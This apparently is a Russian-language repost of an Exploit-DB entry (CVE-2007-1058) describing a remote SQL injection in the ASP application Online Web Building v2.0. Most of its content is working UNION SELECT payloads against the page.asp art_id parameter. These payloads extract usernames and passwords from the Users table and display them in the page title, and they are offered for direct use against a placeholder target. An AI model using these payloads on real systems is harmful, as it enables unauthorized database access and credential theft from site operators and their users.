- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3339
- Проверка EDB
-
- Пройдено
- Автор
- MEHMET INCE
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2007-1058
- Дата публикации
- 2007-02-20
Код:
----------------------------------------------------------------------
Online Web Building v2.0 (id) Remote SQL Injection
-----------------------------------------------------------------------
Bulan: xoron
-----------------------------------------------------------------------
Download: http://www.aspindir.com/Goster/3439
-----------------------------------------------------------------------
Exploit: http://www.target.com/ page.asp?art_id=[SQL]
Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1
Pass: page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1
-----------------------------------------------------------------------
Page title is username + password
-----------------------------------------------------------------------
# milw0rm.com [2007-02-20]- Источник
- www.exploit-db.com
